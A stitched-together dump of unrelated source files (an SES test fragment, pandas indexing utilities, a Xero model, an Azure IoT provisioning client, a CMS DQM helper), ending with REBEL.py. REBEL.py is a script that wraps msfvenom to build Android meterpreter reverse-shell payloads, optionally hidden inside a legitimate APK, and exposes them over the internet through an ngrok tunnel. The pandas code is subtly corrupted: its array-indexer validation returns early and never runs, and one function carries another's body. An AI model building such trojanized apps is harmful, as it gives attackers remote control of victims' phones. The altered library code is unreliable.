assert mail_from_provider.domain == "example.com"
assert mail_from_provider.mail_from_subdomain == ""
recordsets = mail_from_provider.generate_dns_recordsets()
assert len(recordsets) == 0
def test_generate_dns_recordsets_returns_values_when_subdomain():
mail_from_provider = MailFromDomainProvider()
request = Request("Create", "example.com", "mail")
mail_from_provider.set_request(request, {})
assert mail_from_provider.is_valid_request()
assert mail_from_provider.domain == "example.com"
assert mail_from_provider.mail_from_subdomain == "mail"
recordsets = mail_from_provider.generate_dns_recordsets()
print(json.dumps(recordsets, indent=2))
assert len(recordsets) == 2
expected_mx = {
"Name": "mail.example.com.",
"ResourceRecords": ["10 feedback-smtp.eu-west-1.amazonses.com"],
"TTL": "60",
"Type": "MX",
}
expected_txt = {
"Name": "mail.example.com.",
"ResourceRecords": ["v=spf1 include:amazonses.com ~all"],
"TTL": "60",
"Type": "TXT",
}
assert expected_mx in recordsets
assert expected_txt in recordsets
class Request(dict):
def __init__(
self,
request_type,
domain=None,
mail_from_subdomain="",
region="eu-west-1",
physical_resource_id=None,
):
request_id = "request-%s" % uuid.uuid4()
self.update(
{
"RequestType": request_type,
"ResponseURL": "https://httpbin.org/put",
"StackId": "arn:aws:cloudformation:us-west-2:EXAMPLE/stack-name/guid",
"RequestId": request_id,
"ResourceType": "Custom::MailFromDomain",
"LogicalResourceId": "MyMailFromDomain",
"ResourceProperties": {
"Domain": domain,
"MailFromSubdomain": mail_from_subdomain,
},
}
)
if region:
self["ResourceProperties"]["Region"] = region
self["PhysicalResourceId"] = (
physical_resource_id
if physical_resource_id
else "initial-%s" % str(uuid.uuid4())
)
| 35.411111 | 86 | 0.66081 |
71fd5b6aab821a076772efe5323bf517ac1ad90a | 13,589 | py | Python | pandas/core/indexers.py | epizzigoni/pandas | 3b66021ecb74da2c35e16958121bd224d5de5264 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 6 | 2020-09-10T15:03:25.000Z | 2021-04-01T22:48:33.000Z | pandas/core/indexers.py | epizzigoni/pandas | 3b66021ecb74da2c35e16958121bd224d5de5264 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/indexers.py | epizzigoni/pandas | 3b66021ecb74da2c35e16958121bd224d5de5264 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4 | 2020-02-07T05:05:32.000Z | 2020-05-11T06:06:17.000Z | """
Low-dependency indexing utilities.
"""
import warnings
import numpy as np
from pandas._typing import Any, AnyArrayLike
from pandas.core.dtypes.common import (
is_array_like,
is_bool_dtype,
is_extension_array_dtype,
is_integer,
is_integer_dtype,
is_list_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCSeries
# -----------------------------------------------------------
# Indexer Identification
def is_valid_positional_slice(slc: slice) -> bool:
"""
Check if a slice object can be interpreted as a positional indexer.
Parameters
----------
slc : slice
Returns
-------
bool
Notes
-----
A valid positional slice may also be interpreted as a label-based slice
depending on the index being sliced.
"""
def is_int_or_none(val):
return val is None or is_integer(val)
return (
is_int_or_none(slc.start)
and is_int_or_none(slc.stop)
and is_int_or_none(slc.step)
)
def is_list_like_indexer(key) -> bool:
"""
Check if we have a list-like indexer that is *not* a NamedTuple.
Parameters
----------
key : object
Returns
-------
bool
"""
# allow a list_like, but exclude NamedTuples which can be indexers
return is_list_like(key) and not (isinstance(key, tuple) and type(key) is not tuple)
def is_scalar_indexer(indexer, arr_value) -> bool:
"""
Return True if we are all scalar indexers.
Returns
-------
bool
"""
if arr_value.ndim == 1:
if not isinstance(indexer, tuple):
indexer = tuple([indexer])
return any(isinstance(idx, np.ndarray) and len(idx) == 0 for idx in indexer)
return False
def is_empty_indexer(indexer, arr_value: np.ndarray) -> bool:
"""
Check if we have an empty indexer.
Parameters
----------
indexer : object
arr_value : np.ndarray
Returns
-------
bool
"""
if is_list_like(indexer) and not len(indexer):
return True
if arr_value.ndim == 1:
if not isinstance(indexer, tuple):
indexer = tuple([indexer])
return any(isinstance(idx, np.ndarray) and len(idx) == 0 for idx in indexer)
return False
# -----------------------------------------------------------
# Indexer Validation
def check_setitem_lengths(indexer, value, values) -> None:
"""
Validate that value and indexer are the same length.
An special-case is allowed for when the indexer is a boolean array
and the number of true values equals the length of ``value``. In
this case, no exception is raised.
Parameters
----------
indexer : sequence
Key for the setitem.
value : array-like
Value for the setitem.
values : array-like
Values being set into.
Returns
-------
None
Raises
------
ValueError
When the indexer is an ndarray or list and the lengths don't match.
"""
# boolean with truth values == len of the value is ok too
if isinstance(indexer, (np.ndarray, list)):
if is_list_like(value) and len(indexer) != len(value):
if not (
isinstance(indexer, np.ndarray)
and indexer.dtype == np.bool_
and len(indexer[indexer]) == len(value)
):
raise ValueError(
"cannot set using a list-like indexer "
"with a different length than the value"
)
elif isinstance(indexer, slice):
# slice
if is_list_like(value) and len(values):
if len(value) != length_of_indexer(indexer, values):
raise ValueError(
"cannot set using a slice indexer with a "
"different length than the value"
)
def validate_indices(indices: np.ndarray, n: int) -> None:
"""
Perform bounds-checking for an indexer.
-1 is allowed for indicating missing values.
Parameters
----------
indices : ndarray
n : int
Length of the array being indexed.
Raises
------
ValueError
Examples
--------
>>> validate_indices([1, 2], 3)
# OK
>>> validate_indices([1, -2], 3)
ValueError
>>> validate_indices([1, 2, 3], 3)
IndexError
>>> validate_indices([-1, -1], 0)
# OK
>>> validate_indices([0, 1], 0)
IndexError
"""
if len(indices):
min_idx = indices.min()
if min_idx < -1:
msg = f"'indices' contains values less than allowed ({min_idx} < -1)"
raise ValueError(msg)
max_idx = indices.max()
if max_idx >= n:
raise IndexError("indices are out-of-bounds")
# -----------------------------------------------------------
# Indexer Conversion
def maybe_convert_indices(indices, n: int):
"""
Attempt to convert indices into valid, positive indices.
If we have negative indices, translate to positive here.
If we have indices that are out-of-bounds, raise an IndexError.
Parameters
----------
indices : array-like
Array of indices that we are to convert.
n : int
Number of elements in the array that we are indexing.
Returns
-------
array-like
An array-like of positive indices that correspond to the ones
that were passed in initially to this function.
Raises
------
IndexError
One of the converted indices either exceeded the number of,
elements (specified by `n`), or was still negative.
"""
if isinstance(indices, list):
indices = np.array(indices)
if len(indices) == 0:
# If `indices` is empty, np.array will return a float,
# and will cause indexing errors.
return np.empty(0, dtype=np.intp)
mask = indices < 0
if mask.any():
indices = indices.copy()
indices[mask] += n
mask = (indices >= n) | (indices < 0)
if mask.any():
raise IndexError("indices are out-of-bounds")
return indices
# -----------------------------------------------------------
# Unsorted
def length_of_indexer(indexer, target=None) -> int:
"""
Return the expected length of target[indexer]
Returns
-------
int
"""
if target is not None and isinstance(indexer, slice):
target_len = len(target)
start = indexer.start
stop = indexer.stop
step = indexer.step
if start is None:
start = 0
elif start < 0:
start += target_len
if stop is None or stop > target_len:
stop = target_len
elif stop < 0:
stop += target_len
if step is None:
step = 1
elif step < 0:
start, stop = stop + 1, start + 1
step = -step
return (stop - start + step - 1) // step
elif isinstance(indexer, (ABCSeries, ABCIndexClass, np.ndarray, list)):
if isinstance(indexer, list):
indexer = np.array(indexer)
if indexer.dtype == bool:
# GH#25774
return indexer.sum()
return len(indexer)
elif not is_list_like_indexer(indexer):
return 1
raise AssertionError("cannot find the length of the indexer")
def deprecate_ndim_indexing(result):
"""
Helper function to raise the deprecation warning for multi-dimensional
indexing on 1D Series/Index.
GH#27125 indexer like idx[:, None] expands dim, but we cannot do that
and keep an index, so we currently return ndarray, which is deprecated
(Deprecation GH#30588).
"""
if np.ndim(result) > 1:
warnings.warn(
"Support for multi-dimensional indexing (e.g. `index[:, None]`) "
"on an Index is deprecated and will be removed in a future "
"version. Convert to a numpy array before indexing instead.",
DeprecationWarning,
stacklevel=3,
)
def unpack_1tuple(tup):
"""
If we have a length-1 tuple/list that contains a slice, unpack to just
the slice.
Notes
-----
The list case is deprecated.
"""
if len(tup) == 1 and isinstance(tup[0], slice):
# if we don't have a MultiIndex, we may still be able to handle
# a 1-tuple. see test_1tuple_without_multiindex
if isinstance(tup, list):
# GH#31299
warnings.warn(
"Indexing with a single-item list containing a "
"slice is deprecated and will raise in a future "
"version. Pass a tuple instead.",
FutureWarning,
stacklevel=3,
)
return tup[0]
return tup
# -----------------------------------------------------------
# Public indexer validation
def check_array_indexer(array: AnyArrayLike, indexer: Any) -> Any:
"""
Check if `indexer` is a valid array indexer for `array`.
For a boolean mask, `array` and `indexer` are checked to have the same
length. The dtype is validated, and if it is an integer or boolean
ExtensionArray, it is checked if there are missing values present, and
it is converted to the appropriate numpy array. Other dtypes will raise
an error.
Non-array indexers (integer, slice, Ellipsis, tuples, ..) are passed
through as is.
.. versionadded:: 1.0.0
Parameters
----------
array : array-like
The array that is being indexed (only used for the length).
indexer : array-like or list-like
The array-like that's used to index. List-like input that is not yet
a numpy array or an ExtensionArray is converted to one. Other input
types are passed through as is.
Returns
-------
numpy.ndarray
The validated indexer as a numpy array that can be used to index.
Raises
------
IndexError
When the lengths don't match.
ValueError
When `indexer` cannot be converted to a numpy ndarray to index
(e.g. presence of missing values).
See Also
--------
api.types.is_bool_dtype : Check if `key` is of boolean dtype.
Examples
--------
When checking a boolean mask, a boolean ndarray is returned when the
arguments are all valid.
>>> mask = pd.array([True, False])
>>> arr = pd.array([1, 2])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
An IndexError is raised when the lengths don't match.
>>> mask = pd.array([True, False, True])
>>> pd.api.indexers.check_array_indexer(arr, mask)
Traceback (most recent call last):
...
IndexError: Boolean index has wrong length: 3 instead of 2.
NA values in a boolean array are treated as False.
>>> mask = pd.array([True, pd.NA])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
A numpy boolean mask will get passed through (if the length is correct):
>>> mask = np.array([True, False])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
Similarly for integer indexers, an integer ndarray is returned when it is
a valid indexer, otherwise an error is (for integer indexers, a matching
length is not required):
>>> indexer = pd.array([0, 2], dtype="Int64")
>>> arr = pd.array([1, 2, 3])
>>> pd.api.indexers.check_array_indexer(arr, indexer)
array([0, 2])
>>> indexer = pd.array([0, pd.NA], dtype="Int64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
ValueError: Cannot index with an integer indexer containing NA values
For non-integer/boolean dtypes, an appropriate error is raised:
>>> indexer = np.array([0., 2.], dtype="float64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
IndexError: arrays used as indices must be of integer or boolean type
"""
from pandas.core.construction import array as pd_array
# whathever is not an array-like is returned as-is (possible valid array
# indexers that are not array-like: integer, slice, Ellipsis, None)
# In this context, tuples are not considered as array-like, as they have
# a specific meaning in indexing (multi-dimensional indexing)
if is_list_like(indexer):
if isinstance(indexer, tuple):
return indexer
else:
return indexer
# convert list-likes to array
if not is_array_like(indexer):
indexer = pd_array(indexer)
if len(indexer) == 0:
# empty list is converted to float array by pd.array
indexer = np.array([], dtype=np.intp)
dtype = indexer.dtype
if is_bool_dtype(dtype):
if is_extension_array_dtype(dtype):
indexer = indexer.to_numpy(dtype=bool, na_value=False)
else:
indexer = np.asarray(indexer, dtype=bool)
# GH26658
if len(indexer) != len(array):
raise IndexError(
f"Boolean index has wrong length: "
f"{len(indexer)} instead of {len(array)}"
)
elif is_integer_dtype(dtype):
try:
indexer = np.asarray(indexer, dtype=np.intp)
except ValueError as err:
raise ValueError(
"Cannot index with an integer indexer containing NA values"
) from err
else:
raise IndexError("arrays used as indices must be of integer or boolean type")
return indexer
| 28.48847 | 88 | 0.592832 |
5faf7f57b4a4387c0c8991220b31354973078371 | 5,284 | py | Python | venv/Lib/site-packages/xero_python/payrolluk/models/address.py | RobMilinski/Xero-Starter-Branched-Test | c82382e674b34c2336ee164f5a079d6becd1ed46 | [
"MIT"
] | 77 | 2020-02-16T03:50:18.000Z | 2022-03-11T03:53:26.000Z | venv/Lib/site-packages/xero_python/payrolluk/models/address.py | RobMilinski/Xero-Starter-Branched-Test | c82382e674b34c2336ee164f5a079d6becd1ed46 | [
"MIT"
] | 50 | 2020-04-06T10:15:52.000Z | 2022-03-29T21:27:50.000Z | venv/Lib/site-packages/xero_python/payrolluk/models/address.py | RobMilinski/Xero-Starter-Branched-Test | c82382e674b34c2336ee164f5a079d6becd1ed46 | [
"MIT"
] | 27 | 2020-06-04T11:16:17.000Z | 2022-03-19T06:27:36.000Z | # coding: utf-8
"""
Xero Payroll UK
This is the Xero Payroll API for orgs in the UK region. # noqa: E501
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class Address(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"address_line1": "str",
"address_line2": "str",
"city": "str",
"post_code": "str",
"country_name": "str",
}
attribute_map = {
"address_line1": "addressLine1",
"address_line2": "addressLine2",
"city": "city",
"post_code": "postCode",
"country_name": "countryName",
}
def __init__(
self,
address_line1=None,
address_line2=None,
city=None,
post_code=None,
country_name=None,
): # noqa: E501
"""Address - a model defined in OpenAPI""" # noqa: E501
self._address_line1 = None
self._address_line2 = None
self._city = None
self._post_code = None
self._country_name = None
self.discriminator = None
self.address_line1 = address_line1
if address_line2 is not None:
self.address_line2 = address_line2
self.city = city
self.post_code = post_code
if country_name is not None:
self.country_name = country_name
@property
def address_line1(self):
"""Gets the address_line1 of this Address. # noqa: E501
Address line 1 for employee home address # noqa: E501
:return: The address_line1 of this Address. # noqa: E501
:rtype: str
"""
return self._address_line1
@address_line1.setter
def address_line1(self, address_line1):
"""Sets the address_line1 of this Address.
Address line 1 for employee home address # noqa: E501
:param address_line1: The address_line1 of this Address. # noqa: E501
:type: str
"""
if address_line1 is None:
raise ValueError(
"Invalid value for `address_line1`, must not be `None`"
) # noqa: E501
self._address_line1 = address_line1
@property
def address_line2(self):
"""Gets the address_line2 of this Address. # noqa: E501
Address line 2 for employee home address # noqa: E501
:return: The address_line2 of this Address. # noqa: E501
:rtype: str
"""
return self._address_line2
@address_line2.setter
def address_line2(self, address_line2):
"""Sets the address_line2 of this Address.
Address line 2 for employee home address # noqa: E501
:param address_line2: The address_line2 of this Address. # noqa: E501
:type: str
"""
self._address_line2 = address_line2
@property
def city(self):
"""Gets the city of this Address. # noqa: E501
Suburb for employee home address # noqa: E501
:return: The city of this Address. # noqa: E501
:rtype: str
"""
return self._city
@city.setter
def city(self, city):
"""Sets the city of this Address.
Suburb for employee home address # noqa: E501
:param city: The city of this Address. # noqa: E501
:type: str
"""
if city is None:
raise ValueError(
"Invalid value for `city`, must not be `None`"
) # noqa: E501
self._city = city
@property
def post_code(self):
"""Gets the post_code of this Address. # noqa: E501
PostCode for employee home address # noqa: E501
:return: The post_code of this Address. # noqa: E501
:rtype: str
"""
return self._post_code
@post_code.setter
def post_code(self, post_code):
"""Sets the post_code of this Address.
PostCode for employee home address # noqa: E501
:param post_code: The post_code of this Address. # noqa: E501
:type: str
"""
if post_code is None:
raise ValueError(
"Invalid value for `post_code`, must not be `None`"
) # noqa: E501
self._post_code = post_code
@property
def country_name(self):
"""Gets the country_name of this Address. # noqa: E501
Country of HomeAddress # noqa: E501
:return: The country_name of this Address. # noqa: E501
:rtype: str
"""
return self._country_name
@country_name.setter
def country_name(self, country_name):
"""Sets the country_name of this Address.
Country of HomeAddress # noqa: E501
:param country_name: The country_name of this Address. # noqa: E501
:type: str
"""
self._country_name = country_name
| 26.552764 | 78 | 0.585352 |
0cb4596c854b8f1e86e007ab7c65d62740627392 | 3,523 | py | Python | azure-iot-device/azure/iot/device/provisioning/provisioning_device_client.py | necoh/azure-iot-sdk-python-preview | c17eccee9041d197e21c2f2df28b99014133960b | [
"MIT"
] | 35 | 2018-12-01T05:42:30.000Z | 2021-03-10T12:23:41.000Z | azure-iot-device/azure/iot/device/provisioning/provisioning_device_client.py | necoh/azure-iot-sdk-python-preview | c17eccee9041d197e21c2f2df28b99014133960b | [
"MIT"
] | 81 | 2018-11-20T20:01:43.000Z | 2019-09-06T23:57:17.000Z | azure-iot-device/azure/iot/device/provisioning/provisioning_device_client.py | necoh/azure-iot-sdk-python-preview | c17eccee9041d197e21c2f2df28b99014133960b | [
"MIT"
] | 18 | 2019-03-19T18:53:43.000Z | 2021-01-10T09:47:24.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
This module contains one of the implementations of the Provisioning Device Client which uses Symmetric Key authentication.
"""
import logging
from threading import Event
from .abstract_provisioning_device_client import AbstractProvisioningDeviceClient
from .abstract_provisioning_device_client import log_on_register_complete
from .internal.polling_machine import PollingMachine
logger = logging.getLogger(__name__)
class ProvisioningDeviceClient(AbstractProvisioningDeviceClient):
"""
Client which can be used to run the registration of a device with provisioning service
using Symmetric Key authentication.
"""
def __init__(self, provisioning_pipeline):
"""
Initializer for the Provisioning Client.
NOTE : This initializer should not be called directly.
Instead, the class methods that start with `create_from_` should be used to create a client object.
:param provisioning_pipeline: The protocol pipeline for provisioning. As of now this only supports MQTT.
"""
super(ProvisioningDeviceClient, self).__init__(provisioning_pipeline)
self._polling_machine = PollingMachine(provisioning_pipeline)
def register(self):
"""
Register the device with the with thw provisioning service
This is a synchronous call, meaning that this function will not return until the registration
process has completed successfully or the attempt has resulted in a failure. Before returning
the client will also disconnect from the provisioning service.
If a registration attempt is made while a previous registration is in progress it may throw an error.
"""
logger.info("Registering with Provisioning Service...")
register_complete = Event()
# hack to work aroud lack of the "nonlocal" keyword in 2.7. The non-local "context"
# object can be read and modified inside the inner function.
# (https://stackoverflow.com/a/28433571)
class context:
registration_result = None
def on_register_complete(result=None, error=None):
log_on_register_complete(result, error)
context.registration_result = result
register_complete.set()
self._polling_machine.register(callback=on_register_complete)
register_complete.wait()
return context.registration_result
def cancel(self):
"""
This is a synchronous call, meaning that this function will not return until the cancellation
process has completed successfully or the attempt has resulted in a failure. Before returning
the client will also disconnect from the provisioning service.
In case there is no registration in process it will throw an error as there is
no registration process to cancel.
"""
logger.info("Cancelling the current registration process")
cancel_complete = Event()
def on_cancel_complete():
cancel_complete.set()
logger.info("Successfully cancelled the current registration process")
self._polling_machine.cancel(callback=on_cancel_complete)
cancel_complete.wait()
| 44.594937 | 122 | 0.692875 |
58353348c1936db3db8e2d084c6681b73af829d9 | 6,024 | py | Python | DQMServices/Components/python/test/createElements.py | NTrevisani/cmssw | a212a27526f34eb9507cf8b875c93896e6544781 | [
"Apache-2.0"
] | 3 | 2018-08-24T19:10:26.000Z | 2019-02-19T11:45:32.000Z | DQMServices/Components/python/test/createElements.py | NTrevisani/cmssw | a212a27526f34eb9507cf8b875c93896e6544781 | [
"Apache-2.0"
] | 7 | 2016-07-17T02:34:54.000Z | 2019-08-13T07:58:37.000Z | DQMServices/Components/python/test/createElements.py | NTrevisani/cmssw | a212a27526f34eb9507cf8b875c93896e6544781 | [
"Apache-2.0"
] | 5 | 2018-08-21T16:37:52.000Z | 2020-01-09T13:33:17.000Z | #!/usr/bin/env python
from builtins import range
import FWCore.ParameterSet.Config as cms
def createElements():
elements = list()
for i in range(0,10):
elements.append(cms.untracked.PSet(lowX = cms.untracked.double(0),
highX = cms.untracked.double(11),
nchX = cms.untracked.int32(11),
name = cms.untracked.string("Foo"+str(i)),
title = cms.untracked.string("Foo"+str(i)),
value = cms.untracked.double(i),
values = cms.untracked.vdouble()))
elements.append(cms.untracked.PSet(lowX = cms.untracked.double(0),
highX = cms.untracked.double(11),
nchX = cms.untracked.int32(11),
name = cms.untracked.string("Bar0"),
title = cms.untracked.string("Bar0"),
value = cms.untracked.double(-1),
values = cms.untracked.vdouble([i for i in range(0,11)])))
elements.append(cms.untracked.PSet(lowX = cms.untracked.double(0),
highX = cms.untracked.double(11),
nchX = cms.untracked.int32(11),
name = cms.untracked.string("Bar1"),
title = cms.untracked.string("Bar1"),
value = cms.untracked.double(-1),
values = cms.untracked.vdouble([10 - i for i in range(0,11)])))
return elements
def createReadRunElements():
readRunElements = list()
for i in range(0,10):
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble(i),
entries = cms.untracked.vdouble(1)
))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar0"),
means = cms.untracked.vdouble(7),
entries = cms.untracked.vdouble(55)))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar1"),
means = cms.untracked.vdouble(3),
entries = cms.untracked.vdouble(55)))
return readRunElements
def createReadLumiElements():
readLumiElements = list()
for i in range(0,10):
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble([i for x in range(0,10)]),
entries=cms.untracked.vdouble([1 for x in range(0,10)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar0"),
means = cms.untracked.vdouble([7 for x in range(0,10)]),
entries=cms.untracked.vdouble([55 for x in range(0,10)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar1"),
means = cms.untracked.vdouble([3 for x in range(0,10)]),
entries=cms.untracked.vdouble([55 for x in range(0,10)])
))
return readLumiElements
####### MERGED FILES SECTION #######
def createReadRunElements_merged_file1_file2():
readRunElements = list()
for i in range(0,10):
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble(i),
entries = cms.untracked.vdouble(2)
))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar0"),
means = cms.untracked.vdouble(7),
entries = cms.untracked.vdouble(110)))
readRunElements.append(cms.untracked.PSet(name = cms.untracked.string("Bar1"),
means = cms.untracked.vdouble(3),
entries = cms.untracked.vdouble(110)))
return readRunElements
def createReadLumiElements_merged_file1_file2():
readLumiElements = list()
for i in range(0,10):
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Foo"+str(i)),
means = cms.untracked.vdouble([i for x in range(0,20)]),
entries=cms.untracked.vdouble([1 for x in range(0,20)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar0"),
means = cms.untracked.vdouble([7 for x in range(0,20)]),
entries=cms.untracked.vdouble([55 for x in range(0,20)])
))
readLumiElements.append(cms.untracked.PSet(name=cms.untracked.string("Bar1"),
means = cms.untracked.vdouble([3 for x in range(0,20)]),
entries=cms.untracked.vdouble([55 for x in range(0,20)])
))
return readLumiElements
| 62.103093 | 107 | 0.452689 |
f90fa035f3ada405152e9f8ad950e13282b58b74 | 9,792 | py | Python | REBEL.py | root-user744/REBEL | f1e4fbc0f032bda38253f61e3a391a70815e8915 | [
"Apache-2.0"
] | 1 | 2021-01-11T11:27:48.000Z | 2021-01-11T11:27:48.000Z | REBEL.py | root-user744/REBEL | f1e4fbc0f032bda38253f61e3a391a70815e8915 | [
"Apache-2.0"
] | null | null | null | REBEL.py | root-user744/REBEL | f1e4fbc0f032bda38253f61e3a391a70815e8915 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import time
import subprocess
poster = """
\033[32m══════════════════════════════════════════════\033[0m
\033[31m██████\033[32m╗\033[0m \033[31m███████\033[32m╗\033[0m\033[31m██████\033[32m╗\033[0m \033[31m███████\033[32m╗\033[0m\033[31m██\033[32m╗\033[0m
\033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔════╝\033[0m\033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔════╝\033[0m\033[31m██\033[32m║\033[0m
\033[31m██████\033[32m╔╝\033[0m\033[31m█████\033[32m╗\033[0m \033[31m██████\033[32m╔╝\033[0m\033[31m█████\033[32m╗\033[0m \033[31m██\033[32m║\033[0m
\033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔══╝\033[0m \033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔══╝\033[0m \033[31m██\033[32m║\033[0m
\033[31m██\033[32m║\033[0m \033[31m██\033[32m║\033[0m\033[31m███████\033[32m╗\033[0m\033[31m██████\033[32m╔╝\033[0m\033[31m███████\033[32m╗\033[0m\033[31m███████\033[32m╗\033[0m
\033[32m╚═╝\033[0m \033[32m╚═╝\033[0m\033[32m╚══════╝\033[0m\033[32m╚═════╝\033[0m \033[32m╚══════╝\033[0m\033[32m╚══════╝\033[0m
\033[32m═══════════════════════════════════════════════\033[0m
\033[04m\033[37mCreated with love by Nathan Elderson\033[0m
\033[04m\033[37mversion 0.1\033[0m
"""
print(poster)
def createPayload(ip, port, path):
command = "msfvenom -p android/meterpreter/reverse_tcp" + " LHOST=" + ip + " LPORT=" + str(port) + " -o " + path
subprocess.call(command, shell=True)
def createEmbededPayload(appPath, ip, port, path):
command1 = "msfvenom -x " + appPath + " -p android/meterpreter/reverse_tcp" + " LHOST=" + ip + " LPORT=" + str(port) + " -o " + path
subprocess.call(command1, shell=True)
def checkIP(ip):
for letter in ip:
if letter.isalpha() == True:
return False
if ip.count(".") != 3:
return False
if len(ip) < 7 or len(ip) > 15:
return False
if "." in ip[0]:
return False
return True
def animateWord(word):
for char in word:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.030)
def autoExploit(ip, port):
meta = input("[\033[34m:?:\033[0m]\033[32mWant me to open the Metasploit Framework and exploit automatically for you(yes/N):\033[0m ").strip()
if meta == "yes" or meta == "Yes" or meta == "YES" or meta == "y" or meta == "Y":
os.system("clear")
with open("commands.txt", "w") as file:
file.write("use exploit/multi/handler\n")
file.write("set payload android/meterpreter/reverse_tcp\n")
file.write(f"set lhost {ip}\n")
file.write(f"set lport " + str(port) + "\n")
file.write("exploit")
elif meta == "no" or meta == "No" or meta == "NO" or meta == "n" or meta == "N":
print(" [\033[93m:)\033[0m]\033[32mOK Bye!!!\033[0m")
exit()
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option.\033[0m")
exit()
WAN = False
wanORlan = input("[\033[34m:?:\033[0m]\033[32mWant to make payload for LAN or WAN(l/WAN):\033[0m ").strip()
if wanORlan == "wan" or wanORlan == "Wan" or wanORlan == "WAN" or wanORlan == "w" or wanORlan == "W":
WAN = True
print("\n\033[36mOpen up a new terminal and start a ngrok tcp tunnel with command \033[01m\033[32mngrok tcp 1234\033[0m")
print("\033[36mGrab the IP and Port of the TCP tunnel and provide this IP and Port when prompted...\033[0m")
print("\033[36mAfter this job press Enter to continue...\033[0m")
input()
elif wanORlan == "lan" or wanORlan == "Lan" or wanORlan == "LAN" or wanORlan == "l" or wanORlan == "L":
WAN = False
print("[\033[34m:+:\033[0m]\033[32mProvide your local IP...\033[0m")
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option...\033[0m")
exit()
IP = input("[\033[34m:+:\033[0m]\033[32mEnter the IP Address:\033[0m ")
if IP == "":
print("[\033[31m:✗:\033[0m]\033[31mNo IP provided.\033[0m")
exit()
else:
IPcheckPass = checkIP(IP)
if IPcheckPass == True:
pass
else:
print("[\033[31m:✗:\033[0m]\033[31mSeems like you need to learn about some basic networking...\033[0m")
exit()
try:
Port = input("[\033[34m:+:\033[0m]\033[32mEnter the Port Number to bind to:\033[0m ")
if Port == "":
print("[\033[31m:✗:\033[0m]\033[31mNo Port Number was provided.\033[0m")
exit()
for ch in Port:
if ch.isalpha() == True:
raise Exception
except Exception:
print("[\033[31m:✗:\033[0m]\033[31mSeems like you need to learn about some basic networking...\033[0m")
exit()
embeded = False
embed = input("[\033[34m:?:\033[0m]\033[32mWant an embeded payload(y) or just the raw payload(NO){y/NO}:\033[0m ").strip()
if embed == "yes" or embed == "Yes" or embed == "YES" or embed == "y" or embed == "Y":
embeded = True
filePath = input("[\033[34m:+:\033[0m]\033[32mEnter the path to original .apk file(\033[04m\033[01mprovide/the/full_path\033[0m\033[32m):\033[0m ").rstrip("/")
check1 = os.path.exists(filePath)
if check1 == True:
if ".apk" not in filePath:
print(f"[\033[31m:✗:\033[0m]\033[31m{filePath} is a directory but i asked for a .apk file...\033[0m")
exit()
if check1 == False:
print("[\033[31m:✗:\033[0m]\033[31mPath does not exists.\033[0m")
exit()
payloadName = input("[\033[34m:+:\033[0m]\033[32mName the new embeded payload(\033[04m\033[01me.g. name.apk\033[0m\033[32m):\033[0m ")
if payloadName == "":
print("[\033[31m:✗:\033[0m]\033[31mNo name was provided.\033[0m")
print("""[\033[34m:+:\033[0m]\033[32mSelecting default name "Anti-Virus.apk"\033[0m """)
payloadName = "Anti-Virus.apk"
if ".apk" not in payloadName:
print("[\033[31m:✗:\033[0m]\033[31mmissing file extention '.apk'\033[0m")
exit()
else:
pass
newName = False
payloadPath = input("[\033[34m:+:\033[0m]\033[32mEnter the path to output the embeded payload\n(eg: \033[04m/please/provide/only_the/path/\033[0m\033[32m):\033[0m ").rstrip("/")
check2 = os.path.exists(payloadPath)
if payloadPath == "":
newName = True
out = os.getcwd()
payloadPath = out
elif check2 == False:
print("[\033[31m:✗:\033[0m]\033[31mPath does not exists.\033[0m")
exit()
elif ".apk" in payloadPath:
print("[\033[31m:✗:\033[0m]\033[31mIt was asked to provide only the path.\nStart the program again...\033[0m")
exit()
if newName == False:
sentence2 = (f'\n\033[32mGenerating embeded payload having name "{payloadName}" with love only for you...\033[0m\n')
else:
newName == True
